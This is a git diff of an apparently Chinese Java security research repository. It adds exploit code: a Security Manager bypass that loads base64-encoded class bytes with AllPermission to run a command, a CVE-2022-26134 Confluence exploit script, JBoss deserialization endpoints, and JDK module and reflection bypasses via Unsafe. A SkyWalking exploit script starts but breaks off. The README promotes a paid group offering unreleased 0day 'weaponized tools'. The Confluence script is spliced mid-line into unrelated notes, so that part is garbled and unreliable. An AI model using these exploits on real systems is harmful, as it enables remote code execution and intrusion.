diff --git a/BypassSM/BypassOfCreateClassLoader.java b/BypassSM/BypassOfCreateClassLoader.java new file mode 100644 index 0000000..21ec80e --- /dev/null +++ b/BypassSM/BypassOfCreateClassLoader.java @@ -0,0 +1,54 @@ +package com.evil; + +import java.security.*; +import java.security.cert.Certificate; + +public class MyPoc { + //-Djava.security.manager -Djava.security.policy==bypass-by-createclassloader.policy + static { + try { + Exp(); + } catch (Exception e) { + e.printStackTrace(); + } + } + + public static void Exp() throws Exception{ + BypassClassLoader0 bypassClassLoader = new BypassClassLoader0(); + Class aClass0 = bypassClassLoader.get(base64Decode("yv66vgAAADQAHwoABgAWBwAXCgACABYKABgAGQcAGgcAGwEADElubmVyQ2xhc3NlcwEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQALTGV2aWxDbGFzczsBAARtYWluAQAWKFtMamF2YS9sYW5nL1N0cmluZzspVgEABGFyZ3MBABNbTGphdmEvbGFuZy9TdHJpbmc7AQAIPGNsaW5pdD4BAApTb3VyY2VGaWxlAQAOZXZpbENsYXNzLmphdmEMAAgACQEAC2V2aWxDbGFzcyQxBwAcDAAdAB4BAAlldmlsQ2xhc3MBABBqYXZhL2xhbmcvT2JqZWN0AQAeamF2YS9zZWN1cml0eS9BY2Nlc3NDb250cm9sbGVyAQAMZG9Qcml2aWxlZ2VkAQA0KExqYXZhL3NlY3VyaXR5L1ByaXZpbGVnZWRBY3Rpb247KUxqYXZhL2xhbmcvT2JqZWN0OwAhAAUABgAAAAAAAwABAAgACQABAAoAAAAvAAEAAQAAAAUqtwABsQAAAAIACwAAAAYAAQAAAAQADAAAAAwAAQAAAAUADQAOAAAACQAPABAAAQAKAAAAKwAAAAEAAAABsQAAAAIACwAAAAYAAQAAABUADAAAAAwAAQAAAAEAEQASAAAACAATAAkAAQAKAAAAKAACAAAAAAAMuwACWbcAA7gABFexAAAAAQALAAAACgACAAAABgALABEAAgAUAAAAAgAVAAcAAAAKAAEAAgAAAAAACA=="), "evilClass"); + bypassClassLoader.get(base64Decode("yv66vgAAADQALQoACAAcCgAdAB4IAB8KAB0AIAcAIQoABQAiBwAjBwAkBwAlAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAAxJbm5lckNsYXNzZXMBAA1MZXZpbENsYXNzJDE7AQADcnVuAQAUKClMamF2YS9sYW5nL09iamVjdDsBAAR2YXIyAQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQANU3RhY2tNYXBUYWJsZQcAIQEAClNvdXJjZUZpbGUBAA5ldmlsQ2xhc3MuamF2YQEAD0VuY2xvc2luZ01ldGhvZAcAJgwACgALBwAnDAAoACkBAARjYWxjDAAqACsBABNqYXZhL2xhbmcvRXhjZXB0aW9uDAAsAAsBAAtldmlsQ2xhc3MkMQEAEGphdmEvbGFuZy9PYmplY3QBAB5qYXZhL3NlY3VyaXR5L1ByaXZpbGVnZWRBY3Rpb24BAAlldmlsQ2xhc3MBABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7AQAPcHJpbnRTdGFja1RyYWNlADAABwAIAAEACQAAAAIAAAAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEAAAACAA0AAAAGAAEAAAAGAA4AAAAMAAEAAAAFAA8AEQAAAAEAEgATAAEADAAAAGoAAgACAAAAErgAAhIDtgAEVwGwTCu2AAYBsAABAAAACgALAAUAAwANAAAAFgAFAAAACQAJAAoACwALAAwADAAQAA0ADgAAABYAAgAMAAYAFAAVAAEAAAASAA8AEQAAABYAAAAGAAFLBwAXAAMAGAAAAAIAGQAaAAAABAAbAAAAEAAAAAoAAQAHAAAAAAAI"), "evilClass$1"); + Class.forName(aClass0.getName(), true, bypassClassLoader); + } + + public static byte[] base64Decode(String bs) throws Exception { + Class base64; + byte[] value = null; + try { + base64 = Class.forName("java.util.Base64"); + Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null); + value = (byte[]) decoder.getClass().getMethod("decode", new Class[]{String.class}).invoke(decoder, new Object[]{bs}); + } catch (Exception e) { + try { + base64 = Class.forName("sun.misc.BASE64Decoder"); + Object decoder = base64.newInstance(); + value = (byte[]) decoder.getClass().getMethod("decodeBuffer", new Class[]{String.class}).invoke(decoder, new Object[]{bs}); + } catch (Exception e2) { + } + } + return value; + } + + public static class BypassClassLoader0 extends ClassLoader{ + public Class get(byte[] b,String name) { + PermissionCollection pc = new Permissions(); + pc.add(new AllPermission()); + //设置ProtectionDomain + ProtectionDomain pd = new ProtectionDomain(new CodeSource(null, (Certificate[]) null), pc, this, null); + return super.defineClass(name, b, 0, b.length,pd); + } + } + + public static void main(String[] args) { + + } +} diff --git a/Confluence/CVE-2022-26134.py b/Confluence/CVE-2022-26134.py new file mode 100644 index 0000000..4b3ee09 --- /dev/null +++ b/Confluence/CVE-2022-26134.py @@ -0,0 +1,114 @@ +# -*- coding: utf-8 -* +# /usr/bin/python3 +# @Author:Firebasky +import argparse +import re +import requests +import urllib3 + +# https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/ + +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +# 利用脚本 +result = [] # 结果 + + +# 添加 +endpoints = [ +] + + +headers = { + 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', + 'Content-Type': 'application/x-www-form-urlencoded', + 'Cookie': 'ADMINCONSOLESESSION=1hDwvQkPnPmLyDpwJvBL1qWTyXLYvQqSlMvJv3h7xyTxz5BJtGm3!1162256454', + 'X-Forwarded-For': '127.0.0.1', + 'X-Client-IP': '127.0.0.1', + 'X-Remote-IP': '127.0.0.1', + 'X-Remote-Addr': '127.0.0.1', + 'X-Originating-IP': '127.0.0.1', +} + +proxy = { + # 'http': '127.0.0.1:8080' +} + + +def check_target_version(host, socket_proxies): + try: + response = requests.get("{}/login.action".format(host),headers=headers, timeout=2, verify=False, proxies=socket_proxies, allow_redirects=False) + if response.status_code == 200: + filter_version = re.findall(".*", response.text) + if (len(filter_version) >= 1): + version = filter_version[0].split("'>")[1].split('自己在学习jvm这本书会记录其中的知识点. + ++ [通过实例一行一行分析JVM的invokespecial和invokevirtual指令](http://wxweven.win/2017/09/15/JVM-invokespecial%E5%92%8Cinvokevirtual/) diff --git a/Jboss/README.md b/Jboss/README.md index 0a7263d..6e56210 100644 --- a/Jboss/README.md +++ b/Jboss/README.md @@ -1,6 +1,508 @@ -## jboss介绍: +# jboss介绍: JBoss 是一个基于J2EE的[开放源代码](https://baike.baidu.com/item/开放源代码/114160)的[应用服务器](https://baike.baidu.com/item/应用服务器/4971773)。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。 自己测试了网上很多工具发现不是特别好用 而且不集中。。。。 所以自己想写一个综合利用的工具。。。 + ++ [JBOSS CVE-2017-12149 WAF绕过之旅](https://www.yulegeyu.com/2021/03/05/JBOSS-CVE-2017-12149-WAF%E7%BB%95%E8%BF%87%E4%B9%8B%E6%97%85/) + +## 反序列化漏洞 +bypass 请求方式是HEAD + +**endpoint** +``` +/invoker/readonly 是一个filter 请求方法随便并且url后面可以加其他的 +/invoker/EJBInvokerServlet +/invoker/JMXInvokerServlet +/invoker/readonly/JMXInvokerServlet +/invoker/restricted/JMXInvokerServlet +``` +http-invoker.sar 组件的问题 + +web.xml + +```xml + + + + + + + ReadOnlyAccessFilter + org.jboss.invocation.http.servlet.ReadOnlyAccessFilter + + readOnlyContext + readonly + The top level JNDI context the filter will enforce + read-only access on. If specified only Context.lookup operations + will be allowed on this context. Another other operations or lookups + on any other context will fail. Do not associate this filter with the + JMXInvokerServlets if you want unrestricted access. + + + + invokerName + jboss:service=NamingBeanImpl + The JMX ObjectName of the naming service mbean + + + + + + ReadOnlyAccessFilter + /readonly/* + + + + + EJBInvokerServlet + The EJBInvokerServlet receives posts containing serlized + MarshalledInvocation objects that are routed to the EJB invoker given by + the invokerName init-param. The return content is a serialized + MarshalledValue containg the return value of the inovocation, or any + exception that may have been thrown. + + org.jboss.invocation.http.servlet.InvokerServlet + + invokerName + jboss:service=invoker,type=http + The RMI/HTTP EJB compatible invoker + + 1 + + + JMXInvokerServlet + The JMXInvokerServlet receives posts containing serlized + MarshalledInvocation objects that are routed to the invoker given by + the the MBean whose object name hash is specified by the + invocation.getObjectName() value. The return content is a serialized + MarshalledValue containg the return value of the inovocation, or any + exception that may have been thrown. + + org.jboss.invocation.http.servlet.InvokerServlet + 1 + + + + JNDIFactory + A servlet that exposes the JBoss JNDI Naming service stub + through http. The return content is a serialized + MarshalledValue containg the org.jnp.interfaces.Naming stub. This + configuration handles requests for the standard JNDI naming service. + + org.jboss.invocation.http.servlet.NamingFactoryServlet + + namingProxyMBean + jboss:service=invoker,type=http,target=Naming + + + proxyAttribute + Proxy + + 2 + + + + ReadOnlyJNDIFactory + A servlet that exposes the JBoss JNDI Naming service stub + through http, but only for a single read-only context. The return content + is a serialized MarshalledValue containg the org.jnp.interfaces.Naming + stub. + + org.jboss.invocation.http.servlet.NamingFactoryServlet + + namingProxyMBean + jboss:service=invoker,type=http,target=Naming,readonly=true + + + proxyAttribute + Proxy + + 2 + + + + + JNDIFactory + /JNDIFactory/* + + + + ReadOnlyJNDIFactory + /ReadOnlyJNDIFactory/* + + + EJBInvokerServlet + /EJBInvokerServlet/* + + + JMXInvokerServlet + /JMXInvokerServlet/* + + + + JMXInvokerServlet + /readonly/JMXInvokerServlet/* + + + + + JNDIFactory + /restricted/JNDIFactory/* + + + JMXInvokerServlet + /restricted/JMXInvokerServlet/* + + + + + + HttpInvokers + An example security config that only allows users with the + role HttpInvoker to access the HTTP invoker servlets + + /restricted/* + GET + POST + + + HttpInvoker + + + + BASIC + JBoss HTTP Invoker + + + + HttpInvoker + + +``` +org.jboss.invocation.http.servlet.ReadOnlyAccessFilter +```java +// +// Source code recreated from a .class file by IntelliJ IDEA +// (powered by FernFlower decompiler) +// + +package org.jboss.invocation.http.servlet; + +import java.io.IOException; +import java.io.ObjectInputStream; +import java.lang.reflect.Method; +import java.security.Principal; +import java.util.Map; +import javax.management.MBeanServer; +import javax.management.ObjectName; +import javax.servlet.Filter; +import javax.servlet.FilterChain; +import javax.servlet.FilterConfig; +import javax.servlet.ServletException; +import javax.servlet.ServletInputStream; +import javax.servlet.ServletRequest; +import javax.servlet.ServletResponse; +import javax.servlet.http.HttpServletRequest; +import org.jboss.invocation.MarshalledInvocation; +import org.jboss.logging.Logger; +import org.jboss.mx.util.MBeanServerLocator; + +public class ReadOnlyAccessFilter implements Filter { + private static Logger log = Logger.getLogger(ReadOnlyAccessFilter.class); + private FilterConfig filterConfig = null; + private String readOnlyContext; + private Map namingMethodMap; + + public ReadOnlyAccessFilter() { + } + + public void init(FilterConfig filterConfig) throws ServletException { + this.filterConfig = filterConfig; + if (filterConfig != null) { + this.readOnlyContext = filterConfig.getInitParameter("readOnlyContext"); + String invokerName = filterConfig.getInitParameter("invokerName"); + + try { + MBeanServer mbeanServer = MBeanServerLocator.locateJBoss(); + ObjectName mbean = new ObjectName(invokerName); + this.namingMethodMap = (Map)mbeanServer.getAttribute(mbean, "MethodMap"); + } catch (Exception var5) { + log.error("Failed to init ReadOnlyAccessFilter", var5); + throw new ServletException("Failed to init ReadOnlyAccessFilter", var5); + } + } + + } + + public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws IOException, ServletException { + HttpServletRequest httpRequest = (HttpServletRequest)request; + Principal user = httpRequest.getUserPrincipal(); + if (user == null && this.readOnlyContext != null) { + ServletInputStream sis = request.getInputStream(); + ObjectInputStream ois = new ObjectInputStream(sis); + MarshalledInvocation mi = null; + + try { + mi = (MarshalledInvocation)ois.readObject(); + } catch (ClassNotFoundException var10) { + throw new ServletException("Failed to read MarshalledInvocation", var10); + } + + request.setAttribute("MarshalledInvocation", mi); + mi.setMethodMap(this.namingMethodMap); + Method m = mi.getMethod(); + if (m != null) { + this.validateAccess(m, mi); + } + } + + chain.doFilter(request, response); + } + + public void destroy() { + } + + public String toString() { + if (this.filterConfig == null) { + return "NamingAccessFilter()"; + } else { + StringBuffer sb = new StringBuffer("NamingAccessFilter("); + sb.append(this.filterConfig); + sb.append(")"); + return sb.toString(); + } + } + + private void validateAccess(Method m, MarshalledInvocation mi) throws ServletException { + boolean trace = log.isTraceEnabled(); + if (trace) { + log.trace("Checking against readOnlyContext: " + this.readOnlyContext); + } + + String methodName = m.getName(); + if (!methodName.equals("lookup")) { + throw new ServletException("Only lookups against " + this.readOnlyContext + " are allowed"); + } else { + Object[] args = mi.getArguments(); + Object arg = args.length > 0 ? args[0] : ""; + String name; + if (arg instanceof String) { + name = (String)arg; + } else { + name = arg.toString(); + } + + if (trace) { + log.trace("Checking lookup(" + name + ") against: " + this.readOnlyContext); + } + + if (!name.startsWith(this.readOnlyContext)) { + throw new ServletException("Lookup(" + name + ") is not under: " + this.readOnlyContext); + } + } + } +} +``` +org.jboss.invocation.http.servlet.InvokerServlet +```java +// +// Source code recreated from a .class file by IntelliJ IDEA +// (powered by FernFlower decompiler) +// + +package org.jboss.invocation.http.servlet; + +import java.io.IOException; +import java.io.ObjectInputStream; +import java.io.ObjectOutputStream; +import java.lang.reflect.InvocationTargetException; +import java.security.AccessController; +import java.security.Principal; +import java.security.PrivilegedAction; +import javax.management.MBeanServer; +import javax.management.MalformedObjectNameException; +import javax.management.ObjectName; +import javax.servlet.ServletConfig; +import javax.servlet.ServletException; +import javax.servlet.ServletInputStream; +import javax.servlet.ServletOutputStream; +import javax.servlet.http.HttpServlet; +import javax.servlet.http.HttpServletRequest; +import javax.servlet.http.HttpServletResponse; +import org.jboss.invocation.InvocationException; +import org.jboss.invocation.MarshalledInvocation; +import org.jboss.invocation.MarshalledValue; +import org.jboss.logging.Logger; +import org.jboss.mx.util.JMXExceptionDecoder; +import org.jboss.mx.util.MBeanServerLocator; +import org.jboss.security.SecurityAssociation; +import org.jboss.system.Registry; + +public class InvokerServlet extends HttpServlet { + private static Logger log = Logger.getLogger(InvokerServlet.class); + private static String REQUEST_CONTENT_TYPE = "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation"; + private static String RESPONSE_CONTENT_TYPE = "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue"; + private MBeanServer mbeanServer; + private ObjectName localInvokerName; + + public InvokerServlet() { + } + + public void init(ServletConfig config) throws ServletException { + super.init(config); + + try { + String name = config.getInitParameter("invokerName"); + if (name != null) { + this.localInvokerName = new ObjectName(name); + log.debug("localInvokerName=" + this.localInvokerName); + } + } catch (MalformedObjectNameException var3) { + throw new ServletException("Failed to build invokerName", var3); + } + + this.mbeanServer = MBeanServerLocator.locateJBoss(); + if (this.mbeanServer == null) { + throw new ServletException("Failed to locate the MBeanServer"); + } + } + + public void destroy() { + } + + protected void processRequest(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { + boolean trace = log.isTraceEnabled(); + if (trace) { + log.trace("processRequest, ContentLength: " + request.getContentLength()); + log.trace("processRequest, ContentType: " + request.getContentType()); + } + + Boolean returnValueAsAttribute = (Boolean)request.getAttribute("returnValueAsAttribute"); + + try { + response.setContentType(RESPONSE_CONTENT_TYPE); + MarshalledInvocation mi = (MarshalledInvocation)request.getAttribute("MarshalledInvocation"); + if (mi == null) { + ServletInputStream sis = request.getInputStream(); + ObjectInputStream ois = new ObjectInputStream(sis); + mi = (MarshalledInvocation)ois.readObject(); + ois.close(); + } + + if (mi.getPrincipal() == null && mi.getCredential() == null) { + mi.setPrincipal(InvokerServlet.GetPrincipalAction.getPrincipal()); + mi.setCredential(InvokerServlet.GetCredentialAction.getCredential()); + } + + Object[] params = new Object[]{mi}; + String[] sig = new String[]{"org.jboss.invocation.Invocation"}; + ObjectName invokerName = this.localInvokerName; + if (invokerName == null) { + Integer nameHash = (Integer)mi.getObjectName(); + invokerName = (ObjectName)Registry.lookup(nameHash); + if (invokerName == null) { + throw new ServletException("Failed to find invoker name for hash(" + nameHash + ")"); + } + } + + Object value = this.mbeanServer.invoke(invokerName, "invoke", params, sig); + if (returnValueAsAttribute != null && returnValueAsAttribute) { + request.setAttribute("returnValue", value); + } else { + MarshalledValue mv = new MarshalledValue(value); + ServletOutputStream sos = response.getOutputStream(); + ObjectOutputStream oos = new ObjectOutputStream(sos); + oos.writeObject(mv); + oos.close(); + } + } catch (Throwable var13) { + Throwable t = JMXExceptionDecoder.decode(var13); + if (t instanceof InvocationTargetException) { + InvocationTargetException ite = (InvocationTargetException)t; + t = ite.getTargetException(); + } + + InvocationException appException = new InvocationException(t); + if (returnValueAsAttribute != null && returnValueAsAttribute) { + log.debug("Invoke threw exception", t); + request.setAttribute("returnValue", appException); + } else if (response.isCommitted()) { + log.error("Invoke threw exception, and response is already committed", t); + } else { + response.resetBuffer(); + MarshalledValue mv = new MarshalledValue(appException); + ServletOutputStream sos = response.getOutputStream(); + ObjectOutputStream oos = new ObjectOutputStream(sos); + oos.writeObject(mv); + oos.close(); + } + } + + } + + protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { + this.processRequest(request, response); + } + + protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { + this.processRequest(request, response); + } + + public String getServletInfo() { + return "An HTTP to JMX invocation servlet"; + } + + private static class GetCredentialAction implements PrivilegedAction { + static PrivilegedAction ACTION = new InvokerServlet.GetCredentialAction(); + + private GetCredentialAction() { + } + + public Object run() { + Object credential = SecurityAssociation.getCredential(); + return credential; + } + + static Object getCredential() { + Object credential = AccessController.doPrivileged(ACTION); + return credential; + } + } + + private static class GetPrincipalAction implements PrivilegedAction { + static PrivilegedAction ACTION = new InvokerServlet.GetPrincipalAction(); + + private GetPrincipalAction() { + } + + public Object run() { + Principal principal = SecurityAssociation.getPrincipal(); + return principal; + } + + static Principal getPrincipal() { + Principal principal = (Principal)AccessController.doPrivileged(ACTION); + return principal; + } + } +} +``` diff --git a/Jdbc/Readme.md b/Jdbc/Readme.md index 23848a2..a9a133a 100644 --- a/Jdbc/Readme.md +++ b/Jdbc/Readme.md @@ -2,3 +2,8 @@ >JDBC(Java DataBase Connectivity)是Java和数据库之间的一个桥梁,是一个 规范 而不是一个实现,能够执行SQL语句。它由一组用Java语言编写的类和接口组成。各种不同类型的数据库都有相应的实现。 + MySQL JDBC 客户端反序列化漏洞[参考文章](https://xz.aliyun.com/t/8159) [自己调试的漏洞点](./img/1.png) [自己调试的漏洞点](./img/2.png)**J简单的说:在JDBC连接MySQL的过程中,执行了SHOW SESSION STATUS语句。而如果我们控制返回的结果是一个恶意的对象,jdbc就会去执行readobject方法反序列化,从而有入口点,在利用cc链,完美rce。** + +## 其他利用 +jdbc 利用方式太多了,慢慢学习(重学) + ++ [由CVE-2022-21724引申jdbc漏洞](https://mp.weixin.qq.com/s?__biz=MzUzNDMyNjI3Mg==&mid=2247485275&idx=1&sn=e06b07579ecef87f8cce4536d25789ce&chksm=fa973a34cde0b322ef3949c2cf7fc6bf31e945674d2fe313a3dbf63504bdf737f05cba65de18&mpshare=1&scene=23&srcid=0414XqOEScLh3JIaaHk9pp4v&sharer_sharetime=1649906865169&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) diff --git a/Jdk/Readme.md b/Jdk/Readme.md new file mode 100644 index 0000000..7c4acd2 --- /dev/null +++ b/Jdk/Readme.md @@ -0,0 +1,170 @@ +# JDK + +jdk>12不能反射修改下面class的成员。 +![image](https://user-images.githubusercontent.com/63966847/194300821-dd1bf0bc-b5bd-4680-aa35-49a5d4c8adb4.png) +思路是通过unsafe api去修改Reflection类的成员,赋值为null. +```java + +import sun.misc.Unsafe; +import java.io.ByteArrayOutputStream; +import java.io.InputStream; +import java.lang.reflect.Field; +import java.util.HashMap; + +public class bypass { + private static Unsafe getUnsafe() { + Unsafe unsafe = null; + try { + Field field = Unsafe.class.getDeclaredField("theUnsafe"); + field.setAccessible(true); + unsafe = (Unsafe) field.get(null); + } catch (Exception e) { + throw new AssertionError(e); + } + return unsafe; + } + public static byte[] readInputStream(InputStream inputStream) { + byte[] temp = new byte[4096]; + int readOneNum = 0; + ByteArrayOutputStream bos = new ByteArrayOutputStream(); + try { + while ((readOneNum = inputStream.read(temp)) != -1) { + bos.write(temp, 0, readOneNum); + } + inputStream.close(); + }catch (Exception e){ + } + return bos.toByteArray(); + } + + public void bypassReflectionFilter()throws Exception{ + Unsafe unsafe = getUnsafe(); + Class reflectionClass=Class.forName("jdk.internal.reflect.Reflection"); + byte[] classBuffer = readInputStream(reflectionClass.getResourceAsStream("Reflection.class")); + //定义一个类,但不让类加载器知道它。 + Class reflectionAnonymousClass = unsafe.defineAnonymousClass(reflectionClass,classBuffer,null); + + Field fieldFilterMapField=reflectionAnonymousClass.getDeclaredField("fieldFilterMap"); + //不需要 + //Field methodFilterMapField=reflectionAnonymousClass.getDeclaredField("methodFilterMap"); + + if(fieldFilterMapField.getType().isAssignableFrom(HashMap.class)){ + unsafe.putObject(reflectionClass,unsafe.staticFieldOffset(fieldFilterMapField),new HashMap()); + } + //if(methodFilterMapField.getType().isAssignableFrom(HashMap.class)){ + // unsafe.putObject(reflectionClass,unsafe.staticFieldOffset(methodFilterMapField),new HashMap()); + //} + } + public static void main(String[] args) throws Exception{ + //绕过Java 反射过滤获取ClassLoader私有字段 + //ClassLoader.class.getDeclaredField("parent");//在之前反射会报错 + new bypass().bypassReflectionFilter(); + ClassLoader.class.getDeclaredField("parent");//在之后反射可以bypass + } +} +``` +参考:https://github.com/BeichenDream/Kcon2021Code/blob/master/bypassJdk/JdkSecurityBypass.java + +jdk>16 + +jdk17 bypass module + +https://www.bennyhuo.com/2021/10/02/Java17-Updates-06-internals/ + +https://github.com/BeichenDream/Kcon2021Code/blob/master/bypassJdk/JdkSecurityBypass.java + +在jdk17使用反序列化的时候发现要报错 + +``` +InvokerTransformer: The method 'newTransformer' on 'class com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl' cannot be accessed +``` + + +![image](https://user-images.githubusercontent.com/63966847/208854101-cfe0eee9-5882-4450-9d82-7092d353e30c.png) + +限制了 + +![image](https://user-images.githubusercontent.com/63966847/208854137-7c56007c-ac54-4490-8f30-2753cc0e52e3.png) + + +限制了的类https://cr.openjdk.java.net/~mr/jigsaw/jdk8-packages-strongly-encapsulated + +## 需要bypass + +``` +按照提案的说明,被严格限制的这些内部 API 包括: + +java.* 包下面的部分非 public 类、方法、属性,例如 Classloader 当中的 defineClass 等等。 +sun.* 下的所有类及其成员都是内部 API。 +绝大多数 com.sun.* 、 jdk.* 、org.* 包下面的类及其成员也是内部 API。 +``` + +**code** + +```java + +import sun.misc.Unsafe; +import java.lang.reflect.Field; +import java.lang.reflect.Method; +import java.util.ArrayList; + +/** + * https://cr.openjdk.java.net/~mr/jigsaw/jdk8-packages-strongly-encapsulated + */ +public class BypassModule { + public static void main(String[] args) throws Exception { + final ArrayList classes = new ArrayList<>(); + classes.add(Class.forName("java.lang.reflect.Field")); + classes.add(Class.forName("java.lang.reflect.Method")); + Class aClass = Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"); + classes.add(aClass); + new BypassModule().bypassModule(classes); + aClass.newInstance(); + } + + public void bypassModule(ArrayList classes){ + try { + Unsafe unsafe = getUnsafe(); + Class currentClass = this.getClass(); + try { + Method getModuleMethod = getMethod(Class.class, "getModule", new Class[0]); + if (getModuleMethod != null) { + for (Class aClass : classes) { + Object targetModule = getModuleMethod.invoke(aClass, new Object[]{}); + unsafe.getAndSetObject(currentClass, unsafe.objectFieldOffset(Class.class.getDeclaredField("module")), targetModule); + } + } + }catch (Exception e) { + } + }catch (Exception e){ + e.printStackTrace(); + } + } + + private static Method getMethod(Class clazz,String methodName,Class[] params) { + Method method = null; + while (clazz!=null){ + try { + method = clazz.getDeclaredMethod(methodName,params); + break; + }catch (NoSuchMethodException e){ + clazz = clazz.getSuperclass(); + } + } + return method; + } + + private static Unsafe getUnsafe() { + Unsafe unsafe = null; + try { + Field field = Unsafe.class.getDeclaredField("theUnsafe"); + field.setAccessible(true); + unsafe = (Unsafe) field.get(null); + } catch (Exception e) { + throw new AssertionError(e); + } + return unsafe; + } +} +``` + diff --git a/Jdk/dnsrebinding/Readme.md b/Jdk/dnsrebinding/Readme.md new file mode 100644 index 0000000..cf62f1a --- /dev/null +++ b/Jdk/dnsrebinding/Readme.md @@ -0,0 +1,13 @@ +# java rebinding + +http://www.loongten.com/2020/02/26/dns-rebinding-bypass + +http://www.lpnote.com/2018/11/23/java-dns-cache/ + +https://www.xmanblog.net/java-dns-rebinding-ssrf/ + +https://paper.seebug.org/390/ + +https://powerdns.org/hello-dns/ + +http://www.ruanyifeng.com/blog/2016/06/dns.html diff --git a/Jetty/Readme.md b/Jetty/Readme.md new file mode 100644 index 0000000..5405b5c --- /dev/null +++ b/Jetty/Readme.md @@ -0,0 +1,7 @@ +# Jetty + +好文章: + +https://swarm.ptsecurity.com/jetty-features-for-hacking-web-apps/ + +https://xz.aliyun.com/t/10039 diff --git a/RASP/Readme.md b/RASP/Readme.md index 673efb2..fc2ac3f 100644 --- a/RASP/Readme.md +++ b/RASP/Readme.md @@ -44,7 +44,11 @@ PHP是通过开发第php扩展库来进行实现。 -### 代学习 +### 学习 + +https://blog.csdn.net/HY1273383167/article/details/116211211 1 + +https://blog.csdn.net/u011721501/article/details/74990346 1 https://www.freebuf.com/articles/web/197823.html diff --git a/README.md b/README.md index 25dff63..907e11b 100644 --- a/README.md +++ b/README.md @@ -21,26 +21,27 @@ + 2021/12/19 [添加Jenkins](Jenkins) 💛 💙 💜 ❤️ 💚 + 2022/01/14 [添加了dubbo漏洞分析](Dubbo) 💛 💙 💜 ❤️ 💚 + 2022/01/16 [添加CAS漏洞学习](CAS) 💛 💙 💜 ❤️ 💚 ++ 2022/03/18 [添加Solr利用exp](Solr) 💛 💙 💜 ❤️ 💚 ++ 2022/10/07 [添加jvm的学习笔记](JVM) 💛 💙 💜 ❤️ 💚 ++ 2022/10/07 [添加JDK里面的trick](Jdk) 💛 💙 💜 ❤️ 💚 +## 知识星球 +该知识星球主要是分享java相关的安全知识,绝对精华.里面包含未开放的1day和0day等分享或武器化工具一发入魂 -## 代学习 - -[java设计模式](https://www.runoob.com/design-pattern/design-pattern-tutorial.html) :heavy_check_mark: -[jvm学习]() +![image](https://user-images.githubusercontent.com/63966847/214033050-87bdd0f8-4982-4aac-b79d-a5b6d0f107b9.png) -## 小记录 -2021/12/21更新 - -项目100star啦~~~~~~~~ +## 代学习 -------------------------------- +[java设计模式](https://www.runoob.com/design-pattern/design-pattern-tutorial.html) :heavy_check_mark: +[jvm学习]() 正在学习中. -2022/1/20更新 +## 说明 +目前该项目更新可能会慢一些,更新的基本上是在[添加了Java日常知识点](java日常)中记录自己感觉有意思的文章和小trick,希望对你有帮助. -项目200star啦~~~~~~~~ +如果你遇到了很好的文章非常欢迎提交issues. ## Stargazers over time diff --git "a/Shiro/Shiro\346\235\203\351\231\220\347\273\225\350\277\207/Readme.md" "b/Shiro/Shiro\346\235\203\351\231\220\347\273\225\350\277\207/Readme.md" index 90be438..6073000 100644 --- "a/Shiro/Shiro\346\235\203\351\231\220\347\273\225\350\277\207/Readme.md" +++ "b/Shiro/Shiro\346\235\203\351\231\220\347\273\225\350\277\207/Readme.md" @@ -155,7 +155,10 @@ pom.xml 中版本修改为 1.7.0 或及以下即可 /admin/%20 ``` +## CVE-2022-32532 +[CVE-2022-32532](https://github.com/4ra1n/CVE-2022-32532) +原理参考[CVE-2022-22978 Spring Security RegexRequestMatcher 认证绕过及转发流程分析](https://xz.aliyun.com/t/11473) >参考: > diff --git a/SkyWalking/Readme.md b/SkyWalking/Readme.md new file mode 100644 index 0000000..8ad9aa3 --- /dev/null +++ b/SkyWalking/Readme.md @@ -0,0 +1,12 @@ +# SkyWalking + + + +> Apache Skywalking是一款针对分布式系统的应用程序性能监视工具,为微服务,云原生和基于容器(Docker,Kubernetes,Mesos)的体系结构而设计。 + +## sql->RCE + +https://mp.weixin.qq.com/s/hB-r523_4cM0jZMBOt6Vhw + +https://github.com/vulhub/vulhub/blob/master/skywalking/8.3.0-sqli/README.zh-cn.md + diff --git a/SkyWalking/tool/exp.py b/SkyWalking/tool/exp.py new file mode 100644 index 0000000..a5a2272 --- /dev/null +++ b/SkyWalking/tool/exp.py @@ -0,0 +1,62 @@ +# -*- coding: utf-8 -* +# /usr/bin/python3 +# @Author:Firebasky + +# https://mp.weixin.qq.com/s/hB-r523_4cM0jZMBOt6Vhw +# https://cloud.tencent.com/developer/article/1939867 + +import requests +import urllib3 + +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + + +burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:84.0) Gecko/20100101 Firefox/84.0", + "Accept": "application/json, text/plain, */*", + "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", + "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json;charset=utf-8", + "Origin": 